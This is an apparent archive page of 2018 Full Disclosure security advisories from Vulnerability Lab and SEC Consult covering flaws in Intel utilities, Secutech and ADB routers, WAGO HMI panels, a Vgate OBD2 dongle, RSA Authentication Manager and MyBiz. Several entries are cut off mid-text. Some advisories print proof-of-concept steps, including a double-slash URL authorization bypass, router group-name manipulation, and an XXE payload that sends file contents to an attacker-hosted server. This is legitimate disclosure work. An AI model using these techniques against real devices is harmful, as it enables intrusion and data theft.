2018-07-11 Thread Vulnerability Lab 
Document Title:
===
Intel System CU - Buffer Overflow (Denial of Service) Vulnerability


References (Source):

https://www.vulnerability-lab.com/get_content.php?id=2133

Security ID: INTEL-SA-00134

https://nvd.nist.gov/vuln/detail/CVE-2018-3661
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3661

Acknowledgements:
https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00134.html

http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-3661

CVE-ID:
===
CVE-2018-3661


Release Date:
=
2018-07-11


Vulnerability Laboratory ID (VL-ID):

2133


Common Vulnerability Scoring System:

5.5


Vulnerability Class:

Buffer Overflow


Current Estimated Price:

3.000€ - 4.000€


Abstract Advisory Information:
==
The vulnerability laboratory core research team discovered a local
buffer overflow vulnerability in the official Intel System CU 14.0 and 14.1.


Vulnerability Disclosure Timeline:
==
2018-05-15: Release Date (Intel)
2018-07-11: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=
Published


Affected Product(s):

Intel Systems
Product: Intel System - CU (Utilities) 14.0 build & 14.1 build - (Intel®
C620 Series Chipsets b19)


Exploitation Technique:
===
Local


Severity Level:
===
Medium


Authentication Type:

Restricted authentication (user/moderator) - User privileges


User Interaction:
=
No User Interaction


Disclosure Type:

Bug Bounty Program


Technical Details & Description:

A local buffer overflow vulnerability has been discovered in the
official Intel System CU 14.0 and 14.1 utilities.
The vulnerability can be exploited by local attackers to overwrite
active registers to compromise the process or
affected computer system.

Intel system configuration utilities are vulnerable to a denial of
service, caused by a classic buffer overflow.
By sending a specially-crafted request, a local authenticated attacker
could exploit this vulnerability to cause
a denial of service condition.

Affected are versions of syscfg.exe before release 14.0 build 16 or for
systems based on Intel® C620 Series
Chipsets 14.1 build 19. Affected are Versions of selview.exe before
release 14.0 build 21 or for systems based
on Intel® C620 Series Chipsets before 14.0 build 11.

Exploitation of the local buffer overflow vulnerability requires no user
interaction and system process privileges.
Successful exploitation of the buffer overflow vulnerability results in
a compromise of the local system process or
affected computer system.

Vulnerable File(s):
[+] syscfg.exe
[+] selview.exe


https://www.vulnerability-lab.com/resources/pictures/2133/Intel1.jpg
https://www.vulnerability-lab.com/resources/pictures/2133/Intel2.jpg


Security Risk:
==
The security risk of the exploitable local buffer overflow vulnerability
in the utilities software is estimated as medium.


Credits & Authors:
==
S.AbenMassaoud -
https://www.vulnerability-lab.com/show.php?user=S.AbenMassaoud


Disclaimer & Information:
=
The information provided in this advisory is provided as it is without
any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability
and capability for a particular purpose. Vulnerability-Lab
or its suppliers are not liable in any case of damage, including direct,
indirect, incidental, consequential loss of business profits
or special damages, even if Vulnerability-Lab or its suppliers have been
advised of the possibility of such damages. Some states do
not allow the exclusion or limitation of liability for consequential or
incidental damages so the foregoing limitation may not apply.
We do not approve or encourage anybody to break any licenses, policies,
deface websites, hack into databases or trade with stolen data.

Domains:www.vulnerability-lab.com   www.vuln-lab.com

www.vulnerability-db.com
Services:   magazine.vulnerability-lab.com  paste.vulnerability-db.com  

infosec.vulnerability-db.com
Social: twitter.com/vuln_labfacebook.com/VulnerabilityLab   

youtube.com/user/vulnerability0lab
Feeds:  vulnerability-lab.com/rss/rss.php
vulnerability-lab.com/rss/rss_upcoming.php
vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php
vulnerability-lab.com/register.php
vulnerability-lab.com/list-of-bug-bounty-programs.php

Any modified copy or reproduction, including partially usages, of this
file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribu

[FD] Secutech DSL WR RIS 330 - Filter Bypass Vulnerability

2018-07-11 Thread Vulnerability Lab 
:language=en
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 131

MACC=&GO=advance.asp&v12_time=1477567396.02&WANT1=3&net_type=2&PUN=Lawrence%40connecy.au&PPW=hivulnerable&wirelesspassword=7331

RESPONSE-
HTTP/1.0 302 Redirect
Server: GoAhead-Webs
Pragma: no-cache
Cache-Control: no-cache
Content-Type: text/html
Location: http://localhost/notice.asp


  This document has moved to a new http://localhost/notice.asp";>location.
  Please update your documents to reflect the new location.
  


Solution - Fix & Patch:
===
The vulnerability can be patched by a restriction and approval of the
affected key parameter in the POST method request.
Disallow to save any input less then 8 characters to permanently grant
the security of the customer using the mentioned hardware.


Security Risk:
==
The security risk of the filter bypass router vulnerability in the
password setup module is estimated as medium (CVSS 3.3).


Credits & Authors:
==
Lawrence Amer (Vulnerability Lab Core Research Team)
[zeroat...@gmail.com] -
https://www.vulnerability-lab.com/show.php?user=Lawrence+Amer


Disclaimer & Information:
=
The information provided in this advisory is provided as it is without
any warranty. Vulnerability Lab disclaims all warranties, either
expressed or
implied, including the warranties of merchantability and capability for
a particular purpose. Vulnerability-Lab or its suppliers are not liable
in any
case of damage, including direct, indirect, incidental, consequential
loss of business profits or special damages, even if Vulnerability Labs
or its
suppliers have been advised of the possibility of such damages. Some
states do not allow the exclusion or limitation of liability mainly for
incidental
or consequential damages so the foregoing limitation may not apply. We
do not approve or encourage anybody to break any licenses, policies, deface
websites, hack into databases or trade with stolen data. We have no need
for criminal activities or membership requests. We do not publish
advisories
or vulnerabilities of religious-, militant- and racist-
hacker/analyst/researcher groups or individuals. We do not publish trade
researcher mails,
phone numbers, conversations or anything else to journalists,
investigative authorities or private individuals.

Domains:www.vulnerability-lab.com   - www.vulnerability-db.com  
-
www.evolution-sec.com
Programs:   vulnerability-lab.com/submit.php-
vulnerability-lab.com/list-of-bug-bounty-programs.php   -
vulnerability-lab.com/register.php
Feeds:  vulnerability-lab.com/rss/rss.php   -
vulnerability-lab.com/rss/rss_upcoming.php  -
vulnerability-lab.com/rss/rss_news.php
Social: twitter.com/vuln_lab- facebook.com/VulnerabilityLab 
-
youtube.com/user/vulnerability0lab

Any modified copy or reproduction, including partially usages, of this
file, resources or information requires authorization from Vulnerability
Laboratory.
Permission to electronically redistribute this alert in its unmodified
form is granted. All other rights, including the use of other media, are
reserved by
Vulnerability Lab Research Team or its suppliers. All pictures, texts,
advisories, source code, videos and other information on this website is
trademark
of vulnerability-lab team & the specific authors or managers. To record,
list, modify, use or edit our material contact (admin@) to get an ask
permission.

Copyright © 2018 | Vulnerability Laboratory 
- [Evolution
Security GmbH]™

-- 
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] SEC Consult SA-20180711-0 :: Remote code execution via multiple attack vectors in WAGO e!DISPLAY 7300T

2018-07-11 Thread SEC Consult Vulnerability Lab 
SEC Consult Vulnerability Lab Security Advisory < 20180711-0 >
===
  title: Remote code execution via multiple attack vectors
product: WAGO e!DISPLAY 7300T - WP 4.3 480x272 PIO1
 vulnerable version: FW 01 - 01.01.10(01)
  fixed version: FW 02
 CVE number: CVE-2018-12979, CVE-2018-12980, CVE-2018-12981
 impact: High
   homepage: https://www.wago.com/
  found: 2018-04-25
 by: T. Weber (Office Vienna)
 SEC Consult Vulnerability Lab

 An integrated part of SEC Consult
 Europe | Asia | North America

 https://www.sec-consult.com

===

Vendor description:
---
"New ideas are the driving force behind our success WAGO is a family-owned
company headquartered in Minden, Germany. Independently operating for three
generations, WAGO is the global leader of spring pressure electrical
interconnect and automation solutions. For more than 60 years, WAGO has
developed and produced innovative products for packaging, transportation,
process, industrial and building automation markets amongst others. Aside from
its innovations in spring pressure connection technology, WAGO has introduced
numerous innovations that have revolutionized industry. Further ground-breaking
inventions include: the WAGO-I/O-SYSTEM®, TOPJOB S® and WALL-NUTS®."

Source: http://www.wago.us/wago/

"For visualization tasks with CODESYS 2 and CODESYS 3: WAGO's new e!DISPLAY
7300T Web Panels help you reinforce the quality of your machinery and equipment
with a refined design and industry-leading software. Learn more about how the
right Web Panels make a difference.

HMI components are the finishing touch for machines or systems and they have an
overwhelming impact on purchase decisions. WAGO offers aesthetically pleasing
HMIs that leave a lasting impression and significantly increase both the value
and image of your machine or system. WAGO’s e!DISPLAY 7300T Web Panel is
available in 4.3'', 5.7'', 7.0'' and 10.1'' display sizes."

Source:
http://www.wago.us/products/components-for-automation/operation-and-monitoring/web-panels-edisplay-7300t/overview/index.jsp


Business recommendation:

HMI displays are widely used in SCADA infrastructures. The link between
their administrative (or informational) web interfaces and the users which
access these interfaces is critical. The presented attacks demonstrate how
simple it is to inject malicious code in order to break the security of this
link by exploiting minimal user interaction.

As a consequence a computer which is used for HMI administration should not
provide any possibility to get compromised via malicious script code.

One possible solution may be e.g.:
   * Don't allow email clients
   * Don't provide Internet access at all on the HMI stations

SEC Consult recommends to immediately apply the available patches from the 
vendor.
A thorough security review should be performed by security professionals to
identify further potential security issues.


Vulnerability overview/description:
---
1) Multiple Reflected POST Cross-Site Scripting (CVE-2018-12981)
Reflected cross site scripting vulnerabilities were identified within multiple 
PHP
scripts in the admin interface. The parameter JSON input which is sent to the
device is not sanitized sufficiently. An attacker can exploit this
vulnerability to execute arbitrary scripts in the context of the attacked user
and gain control over the active session.

This vulnerability is present for authenticated and unauthenticated users!


2) Stored Cross-Site Scripting (CVE-2018-12981)
A stored cross-site scripting vulnerability was identified within the
"PLC List" which can be configured in the web interface of the e!Display. By
storing a payload there, an administrative or guest user can be attacked
without tricking them to visit a malicious web site or clicking on an
malicious link.

This vulnerability is only present for authenticated users!


3) Unrestricted File Upload and File Path Manipulation (CVE-2018-12980)
Arbitrary files can be uploaded to the system without any check. It is even
possible to change the location of the uploaded file on the system. As the
web service does not run as privileged user, it is not possible to upload a
file directly to the web root but on many other locations on the file system.
The normal user 'user' and the administrative user 'admin' can both upload
files to the system.


4) Incorrect Default Permissions (CVE-2018-12979)
Due to incorrect default permissions a file in the web root can be overwritten
by the unprivileged 'www' user. This is the sam

[FD] SEC Consult SA-20180704-2 :: Privilege escalation via linux group manipulation in all ADB Broadband Gateways / Routers

2018-07-04 Thread SEC Consult Vulnerability Lab 
Also see our other two advisories regarding critical ADB vulnerabilities
as they have been split up for better readability:

Local root:
https://www.sec-consult.com/en/blog/advisories/local-root-jailbreak-via-network-file-sharing-flaw-in-all-adb-broadband-gateways-routers/

Authorization bypass:
https://www.sec-consult.com/en/blog/advisories/authorization-bypass-in-all-adb-broadband-gateways-routers/


SEC Consult Vulnerability Lab Security Advisory < 20180704-2 >
===
  title: Privilege escalation via linux group manipulation
product: All ADB Broadband Gateways / Routers
 (based on Epicentro platform)
 vulnerable version: Hardware: ADB P.RG AV4202N, DV2210, VV2220, VV5522, etc.
  fixed version: see "Solution" section below
 CVE number: CVE-2018-13110
 impact: critical
   homepage: http://www.adbglobal.com
  found: 2016-07-11
 by: Stefan Viehböck (Office Vienna)
 Johannes Greil (Office Vienna)
 SEC Consult Vulnerability Lab

 An integrated part of SEC Consult
 Europe | Asia | North America

 https://www.sec-consult.com
===

Vendor description:
---
"ADB creates and delivers the right solutions that enable our customers to
reduce integration and service delivery challenges to increase ARPU and reduce
churn. We combine ADB know-how and products with those from a number of third
party industry leaders to deliver complete solutions that benefit from
collaborative thinking and best in class technologies."

Source: https://www.adbglobal.com/about-adb/

"Founded in 1995, ADB initially focused on developing and marketing software
for digital TV processors and expanded its business to the design and
manufacture of digital TV equipment in 1997. The company sold its first set-top
box in 1997 and since then has been delivering a number of set-top boxes, and
Gateway devices, together with advanced software platforms. ADB has sold over
60 million devices worldwide to cable, satellite, IPTV and broadband operators.
ADB employs over 500 people, of which 70% are in engineering functions."

Source: https://en.wikipedia.org/wiki/Advanced_Digital_Broadcast


Business recommendation:

By exploiting the group manipulation vulnerability on affected and unpatched
devices an attacker is able to gain access to the command line interface (CLI)
if previously disabled by the ISP.

Depending on the feature-set of the CLI (ISP dependent) it is then possible to
gain access to the whole configuration and manipulate settings in the web GUI
and escalate privileges to highest access rights.


It is highly recommended by SEC Consult to perform a thorough security review
by security professionals for this platform. It is assumed that further critical
vulnerabilities exist within the firmware of this device.


Vulnerability overview/description:
---
1) Privilege escalation via linux group manipulation (CVE-2018-13110)
An attacker with standard / low access rights within the web GUI is able to
gain access to the CLI (if it has been previously disabled by the configuration)
and escalate his privileges.

Depending on the CLI features it is possible to extract the whole configuration
and manipulate settings or gain access to debug features of the device, e.g.
via "debug", "upgrade", "upload" etc. commands in the CLI.

Attackers can gain access to sensitive configuration data such as VoIP
credentials or other information and manipulate any settings of the device.


Proof of concept:
-
1) Privilege escalation via linux group manipulation (CVE-2018-13110)
It is possible to manipulate the group name setting of "Storage users" and
overwrite the local linux groups called "remoteaccess" or "localaccess" in
(in /etc/group) which define access to Telnet or SSH on the ADB devices.

It may be possible to overwrite the "root" group as well but it may brick the
device and the default user is already within the "root" group. Hence this
attack has not been further tested.

The following steps describe the attack:
a) Add a new group called "localaccess" via the web GUI here:
 http://$IP/ui/dboard/storage/storageusers?backto=storage

   This will generate the following new group in /etc/group. The original
   "localaccess" group will overwritten.

   localaccess:Storage Group:5001:

b) Then delete this group via the web GUI again, the entry will be removed
   from /etc/group completely.

c) Afterwards, create the following new group name entry via the web GUI and
   add your user account (e.g. admin) wh

[FD] SEC Consult SA-20180704-1 :: Authorization Bypass in all ADB Broadband Gateways / Routers

2018-07-04 Thread SEC Consult Vulnerability Lab 
Also see our other two advisories regarding critical ADB vulnerabilities
as they have been split up for better readability:

Local root:
https://www.sec-consult.com/en/blog/advisories/local-root-jailbreak-via-network-file-sharing-flaw-in-all-adb-broadband-gateways-routers/

Privilege escalation:
https://www.sec-consult.com/en/blog/advisories/privilege-escalation-via-linux-group-manipulation-in-all-adb-broadband-gateways-routers/


SEC Consult Vulnerability Lab Security Advisory < 20180704-1 >
===
  title: Authorization Bypass
product: All ADB Broadband Gateways / Routers
 (based on Epicentro platform)
 vulnerable version: Hardware: ADB P.RG AV4202N, DV2210, VV2220, VV5522, etc.
  fixed version: see "Solution" section below
 CVE number: CVE-2018-13109
 impact: critical
   homepage: http://www.adbglobal.com
  found: 2016-06-28
 by: Johannes Greil (Office Vienna)
 SEC Consult Vulnerability Lab

 An integrated part of SEC Consult
 Europe | Asia | North America

 https://www.sec-consult.com
===

Vendor description:
---
"ADB creates and delivers the right solutions that enable our customers to
reduce integration and service delivery challenges to increase ARPU and reduce
churn. We combine ADB know-how and products with those from a number of third
party industry leaders to deliver complete solutions that benefit from
collaborative thinking and best in class technologies."

Source: https://www.adbglobal.com/about-adb/

"Founded in 1995, ADB initially focused on developing and marketing software
for digital TV processors and expanded its business to the design and
manufacture of digital TV equipment in 1997. The company sold its first set-top
box in 1997 and since then has been delivering a number of set-top boxes, and
Gateway devices, together with advanced software platforms. ADB has sold over
60 million devices worldwide to cable, satellite, IPTV and broadband operators.
ADB employs over 500 people, of which 70% are in engineering functions."

Source: https://en.wikipedia.org/wiki/Advanced_Digital_Broadcast


Business recommendation:

By exploiting the authorization bypass vulnerability on affected and unpatched
devices an attacker is able to gain access to settings that are otherwise
forbidden for the user, e.g. through strict settings set by the ISP. It is also
possible to manipulate settings to e.g. enable the telnet server for remote
access if it had been previously disabled by the ISP. The attacker needs some
user account, regardless of the permissions, for login, e.g. the default one
provided by the ISP or printed on the device can be used.


It is highly recommended by SEC Consult to perform a thorough security review
by security professionals for this platform. It is assumed that further critical
vulnerabilities exist within the firmware of this device.


Vulnerability overview/description:
---
1) Authorization bypass vulnerability (CVE-2018-13109)
Depending on the firmware version/feature-set of the ISP deploying the ADB
device, a standard user account may not have all settings enabled within
the web GUI.

An authenticated attacker is able to bypass those restrictions by adding a
second slash in front of the forbidden entry of the path in the URL.
It is possible to access forbidden entries within the first layer of the web
GUI, any further subsequent layers/paths (sub menus) were not possible to access
during testing but further exploitation can't be ruled out entirely.


Proof of concept:
-
1) Authorization bypass vulnerability (CVE-2018-13109)
Assume the following URL is blocked/forbidden within the web GUI settings:
http://$IP/ui/dboard/settings/management/telnetserver

Adding a second slash in front of the blocked entry "telnetserver" will enable
full access including write permissions to change settings:
http://$IP/ui/dboard/settings/management//telnetserver

This works for many other settings within the web GUI!


In our tests it was not possible to access subsequent layers, e.g.:
Assume that both the proxy menu and submenu "rtsp" settings are blocked,
a second slash will _not_ enable access to the RTSP settings:
http://$IP/ui/dboard/settings/proxy//rtsp

Nevertheless, it can't be ruled out that sub menus can be accessed too when
further deeper tests are being performed.


Vulnerable / tested versions:
-
The following devices & firmware have been tested which were the most recent
versions at the time of discovery:

The firmware versions depend on the ISP / customer of ADB and may vary!

ADB P.RG AV

[FD] SEC Consult SA-20180704-0 :: Local root jailbreak via network file sharing flaw in all ADB Broadband Gateways / Routers

2018-07-04 Thread SEC Consult Vulnerability Lab 
Also see our other two advisories regarding critical ADB vulnerabilities
as they have been split up for better readability:

Authorization bypass:
https://www.sec-consult.com/en/blog/advisories/authorization-bypass-in-all-adb-broadband-gateways-routers/

Privilege escalation:
https://www.sec-consult.com/en/blog/advisories/privilege-escalation-via-linux-group-manipulation-in-all-adb-broadband-gateways-routers/


SEC Consult Vulnerability Lab Security Advisory < 20180704-0 >
===
  title: Local root jailbreak via network file sharing flaw
product: All ADB Broadband Gateways / Routers
 (based on Epicentro platform)
 vulnerable version: Hardware: ADB P.RG AV4202N, DV2210, VV2220, VV5522, etc.
  fixed version: see "Solution" section below
 CVE number: CVE-2018-13108
 impact: critical
   homepage: http://www.adbglobal.com
  found: 2016-06-09
 by: Johannes Greil (Office Vienna)
 SEC Consult Vulnerability Lab

 An integrated part of SEC Consult
 Europe | Asia | North America

 https://www.sec-consult.com
===

Vendor description:
---
"ADB creates and delivers the right solutions that enable our customers to
reduce integration and service delivery challenges to increase ARPU and reduce
churn. We combine ADB know-how and products with those from a number of third
party industry leaders to deliver complete solutions that benefit from
collaborative thinking and best in class technologies."

Source: https://www.adbglobal.com/about-adb/

"Founded in 1995, ADB initially focused on developing and marketing software
for digital TV processors and expanded its business to the design and
manufacture of digital TV equipment in 1997. The company sold its first set-top
box in 1997 and since then has been delivering a number of set-top boxes, and
Gateway devices, together with advanced software platforms. ADB has sold over
60 million devices worldwide to cable, satellite, IPTV and broadband operators.
ADB employs over 500 people, of which 70% are in engineering functions."

Source: https://en.wikipedia.org/wiki/Advanced_Digital_Broadcast


Business recommendation:

By exploiting the local root vulnerability on affected and unpatched devices
an attacker is able to gain full access to the device with highest privileges.
Attackers are able to modify any settings that might have otherwise been
prohibited by the ISP. It is possible to retrieve all stored user credentials
(such as VoIP) or SSL private keys. Furthermore, attacks on the internal network
side of the ISP are possible by using the device as a jump host, depending on
the internal network security measures.

Network security should not depend on the security of independent devices,
such as modems. An attacker with root access to such a device can enable
attacks on connected networks, such as administrative networks managed by the
ISP or other users.

It is highly recommended by SEC Consult to perform a thorough security review
by security professionals for this platform. It is assumed that further critical
vulnerabilities exist within the firmware of this device.


Vulnerability overview/description:
---
1) Local root jailbreak via network file sharing flaw (CVE-2018-13108)
Most ADB devices offer USB ports in order for customers to use them for
printer or file sharing. In the past, ADB devices have suffered from symlink
attacks e.g. via FTP server functionality which has been fixed in more recent
firmware versions.

The "Network File Sharing" feature of current ADB devices via USB uses a samba
daemon which accesses the USB drive with highest access rights and exports the
network shares with root user permissions. The default and hardcoded setting
for the samba daemon within the smb.conf on the device has set "wide links =
no" which normally disallows gaining access to the root file system of the
device using symlink attacks via a USB drive.

But an attacker is able to exploit both a web GUI input validation and samba
configuration file parsing problem which makes it possible to access the root
file system of the device with root access rights via a manipulated USB drive.

The attacker can then edit various system files, e.g. passwd and session
information of the web server in order to escalate web GUI privileges and
start a telnet server and gain full system level shell access as root.


This is a local attack and not possible via remote access vectors as an
attacker needs to insert a specially crafted USB drive into the device!
Usually not even the ISPs themselves have direct root access on ADB devices
hence this attack is quite prob

[FD] SEC Consult SA-20180529-0 :: Unprotected WiFi access & Unencrypted data transfer in Vgate iCar2 OBD2 Dongle

2018-05-29 Thread SEC Consult Vulnerability Lab 
SEC Consult Vulnerability Lab Security Advisory < 20180529-0 >
===
  title: Unprotected WiFi access & Unencrypted data transfer
product: Vgate iCar 2 WiFi OBD2 Dongle
 vulnerable version: Vgate iCar 2 WiFi OBD2 Dongle
  fixed version: -
 CVE number: CVE-2018-11476
 CVE-2018-11477
 CVE-2018-11478
 impact: Critical
   homepage: http://www.vgate.com.cn
  found: 2018-04-24
 by: T. Weber (Office Vienna)
 SEC Consult Vulnerability Lab

 An integrated part of SEC Consult
 Europe | Asia | North America

 https://www.sec-consult.com

===

Vendor description:
---
"Based in Shenzhen, China, Vgate Technology.co ltd. specializes in the
development, design and manufacture of diagnostic equipment, tools and
accessories in the automotive aftermarket industry.
We offers a selective range of products from automotive diagnostic tools
including code readers and scan tools, to test and inspection equipment such as
sensor testers and battery testers. Aside from the above, we also carry garage
equipment like infrared paint dryers and pipe expanders, and automotive
diagnostic accessories such as OBD diagnostic cable assemblies, SAE J1962
connectors, and vehicle to PC (or PDA) interface adapters (VAG-COM interfaces).
Though the company is young in age, we are strong in experiences in that all of
our major engineers have extensive R&D experience in the automotive aftermarket
technology. With the combination of our experienced and distinguished
specialists, low-cost manufacturing and exceptional customer service, M.B is
able to become the supplier of choice who delivers high quality products,
user-friendly designs and most competitive prices to both professional and
amateur (or DIYers) automotive technicians.

We are proud of ourselves in providing cost effective, timely and innovative
solutions with a first class service."

Source: http://www.vgate.com.cn/en/Aboutus.html


Business recommendation:

By using the vulnerabilities which are documented in this advisory an attacker
can easily send arbitrary messages to the automotive communication bus
(CAN/FlexRay/...) of the car electronics and potentially take over
safety-critical car functions.

The vendor told SEC Consult in a phone call that our identified security
issues are common practice for such hardware and therefore will not be fixed!

SEC Consult recommends not to use this product until a thorough security
review has been performed by security professionals and all identified
issues have been resolved.


Vulnerability overview/description:
---
1) Unprotected WiFi Access (CVE-2018-11476)
The dongle opens an unprotected wireless LAN which cannot be configured with an
encryption / password. This enables anyone within the range of the WLAN to
connect to the network without authentication.

2) Unencrypted Data Transfer (CVE-2018-11477)
The data packets which are sent between the App and the OBD dongle are not
encrypted. The combination of this vulnerability with the lack of a wireless
network protection exposes all transferred car data to the public.

3) Unauthenticated Access to On-board Diagnostics (OBD) (CVE-2018-11478)
The OBD port is used to receive measurement data and debug information from the
car. This on-board diagnostics can also be used to send commands to the car
which is different for every vendor / car product line / car.

The mentioned features are usually needed for maintenance purposes but can be
abused by attackers. This is possible because the OBD interface is directly
accessible through port 35000 on the (unprotected) wireless access point of the
OBD device.

Because of the fact that it is never intended that other people have access to
the data bus (e.g. CAN) of your car while you are driving, this vulnerability is
seen as highly critical and a safety-critical threat to the public.


Proof of concept:
-
Detailed of proof of concepts have been removed as the vendor did not provide
a patch.

1) Unprotected WiFi Access (CVE-2018-11476)
The unprotected wireless LAN is named "V-LINK". To create it, the "Fn-Link
(6110R-IF)" is used. It acts as wireless UART bridge to hand over the commands
of the App to the ELM327 compatible "iCar-2" chip.

2) Unencrypted Data Transfer (CVE-2018-11477)
All commands starting with "AT" and the "0100"/"0120" are strings which were
sent from the App to the OBD Dongle. The "X" character is a wildcard for an
arbitrary hexadecimal value and is used to anonymize car data in responses
for this advisory.

The following p

[FD] SEC Consult SA-20180516-0 :: XXE & XSS vulnerabilities in RSA Authentication Manager

2018-05-16 Thread SEC Consult Vulnerability Lab 
SEC Consult Vulnerability Lab Security Advisory < 20180516-0 >
===
  title: XXE & XSS vulnerabilities
product: RSA Authentication Manager
 vulnerable version: 8.2.1.4.0-build1394922, < 8.3 P1
  fixed version: 8.3 P1 and later
 CVE number: CVE-2018-1247
 impact: High
   homepage: https://www.rsa.com
  found: 2017-11-16
 by: Mantas Juskauskas (Office Vilnius)
 SEC Consult Vulnerability Lab

 An integrated part of SEC Consult
 Europe | Asia | North America

 https://www.sec-consult.com

===

Vendor description:
---
"RSA provides more than 30,000 customers around the world with the essential
security capabilities to protect their most valuable assets from cyber
threats. With RSA's award-winning products, organizations effectively detect,
investigate, and respond to advanced attacks; confirm and manage identities;
and ultimately, reduce IP theft, fraud, and cybercrime."

Source: https://www.rsa.com/en-us/company/about


Business recommendation:

By exploiting the vulnerabilities documented in this advisory an attacker can
obtain sensitive information from the RSA Authentication Manager file system,
initiate arbitrary TCP connections or cause DoS. In addition to this, clients
of the RSA Authentication manager can be affected by exploiting client-side
issues.

SEC Consult recommends to apply the available patches from the vendor.


Vulnerability overview/description:
---
1) XML External Entity Injection (XXE) (CVE-2018-1247)
The used XML parser is resolving XML external entities which allows an
authenticated attacker (or an attacker that is able to trick an authenticated
user into importing malicious XML files) to read files, send requests to
systems on the internal network (e.g port scanning) or cause a DoS (e.g.
billion laughs attack).
This issue has been fixed by RSA as described in the advisory DSA-2018-086.
(http://seclists.org/fulldisclosure/2018/May/18)


2) Cross-site Flashing
The vulnerable flash file does not filter or escape the user input
sufficiently. This leads to a reflected cross-site scripting vulnerability.
With reflected cross-site scripting, an attacker can inject arbitrary HTML or
JavaScript code into the victim's web browser. Once the victim clicks a
malicious link the attacker's code is executed in the context of the victim's
web browser.

The vulnerability exists in a third party component called pmfso.
This issue has been fixed by RSA as described in the advisory DSA-2018-082.


3) DOM based Cross-site Scripting
Several client-side scripts handle user supplied data with insufficient
validation before storing it in the DOM. This issue can be exploited to cause
reflected cross-site scripting.

The identified issues exist in third party components. One of the affected
components is PopCalendarX which has an assigned CVE (CVE-2017-9072).
This issue has been fixed by RSA as described in the advisory DSA-2018-082.

Two further issues affecting other third party components are not yet fixed,
as the third party vendor did not supply a patch to RSA yet.


Proof of concept:
-
1) XML External Entity Injection (XXE) (CVE-2018-1247)

The Security Console of the RSA Authentication Manager allows authenticated
users to import SecurID Token jobs in XML format. By importing an XML file
with malicious XML code to the application, it is possible to exploit a blind
XXE vulnerability within the application.

For example, in order to read arbitrary files from the RSA Authentication
Manager OS, the following malicious XML file can be imported via the affected
endpoint:
==
POST /console-ims/ImportTokenJob.do?ptoken=[snip] HTTP/1.1
Host: :7004
Cookie: [snip]

[snip]

-9721941626073
Content-Disposition: form-data; name="textImportFileName.theFile";
filename="xxe_test.xml"
Content-Type: text/xml


/a.dtd">

&e1;

-9721941626073
Content-Disposition: form-data; name="textImportFileName.uploadResult"

[snip]

==

In this case, the attacker has to host the defined a.dtd file in the web root
of a controlled web server:
==
# cat /var/www/a.dtd

:8080/%p1;'>">
%p2;
==

Assuming that the RSA Authentication Manager OS has network level access

Re: [FD] SEC Consult SA-20180514-0 :: Arbitrary File Upload & Cross-site scripting in MyBiz MyProcureNet

2018-05-14 Thread SEC Consult Vulnerability Lab 
The following CVE numbers have been assigned now:
XSS issue: CVE-2018-11090
Arbitrary File Upload: CVE-2018-11091


On 2018-05-14 13:25, SEC Consult Vulnerability Lab wrote:
> SEC Consult Vulnerability Lab Security Advisory < 20180514-0 >
> ===
>   title: Arbitrary File Upload & Cross-site scripting
> product: MyBiz MyProcureNet
>  vulnerable version: 5.0.0
>   fixed version: unknown
>  CVE number: -
>  impact: Critical
>homepage: http://www.mybiz.net/
>   found: 2018-01-29
>  by: Ahmad Ramadhan Amizudin (Office Kuala Lumpur)
>  Fikri Fadzil (Office Singapore)
>  Wan Ikram (Office Kuala Lumpur)
>  Jasveer Singh (Office Kuala Lumpur)
>  SEC Consult Vulnerability Lab
> 
>  An integrated part of SEC Consult
>  Europe | Asia | North America
> 
>  https://www.sec-consult.com
> 
> ===
> 
> Vendor description:
> ---
> "MyBiz is a company fixated on developing technology which transforms the way
> business is done online. At the intersection of what one business needs from
> another is the potential for value to be created differently. This
> intersection for the exchange of value requires technology but in
> fundamentally very different ways from traditional enterprise systems. MyBiz
> believes that the chemistry of business is the business relationships between
> enterprises. The strength of the business relationship drives the success and
> future of the business. MyBiz believes that these business relationships need
> to be captured and orchestrated. MyBiz developed our proprietary Business
> Relationship Network engine, a platform to capture business relationships as
> data to drive new business services which create value efficiently."
> 
> Source: http://www.mybiz.net/copy-of-our-story
> 
> 
> Business recommendation:
> 
> The vendor did not reply to our inquiries since February 2018 hence the issues
> might still exist in current versions.
> 
> SEC Consult recommends not use this product until a thorough security review
> has been performed by security professionals and all identified issues have
> been resolved. It is assumed that MyBiz products are affected by further
> critical security issues.
> 
> 
> Vulnerability overview/description:
> ---
> The identified vulnerabilities can be exploited after authentication but
> the registration for the application is usually open for anyone.
> 
> 1. Arbitrary File Upload
> A malicious file can be uploaded to the webserver by an attacker. It is
> possible for an attacker to upload a script to issue operating system
> commands.
> 
> This vulnerability occurs because an attacker is able to adjust the
> "HiddenFieldControlCustomWhiteListedExtensions" parameter and add arbitrary
> extensions to the whitelist during the upload.
> 
> For instance, if the extension .asp is added to the
> "HiddenFieldControlCustomWhiteListedExtensions" parameter, the server
> accepts "secctest.asp" as legitimate file. Hence malicious files can be
> uploaded in order to execute arbitrary commands to take over the server.
> 
> 
> 2. Reflected Cross-site scripting
> This vulnerability within "ProxyPage.aspx" allows an attacker to inject
> malicious client side scripting which will be executed in the browser of
> users if they visit the manipulated site.
> 
> 
> Proof of concept:
> -
> The proof of concept has been removed as no patch is available.
> 
> 
> Vulnerable / tested versions:
> -
> MyBiz MyProcureNet version 5.0.0 has been tested and found to be vulnerable. 
> This
> was the latest version available at the time of the test.
> 
> 
> Vendor contact timeline:
> 
> 2018-02-22: Contacting vendor through i...@mybiz.net (no response)
> 2018-02-27: Request update from vendor (no response)
> 2018-03-13: Trying to contact via web form http://www.mybiz.net/contact-us
> (no response)
> 2018-05-14: Public release of security advisory
> 
> 
> Solution:
> -----
> None
> 
> 
> Workaround:
> ---
> None
> 
> 
> Advisory URL:
> -
> https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html
> 
> ~~~~~~~~

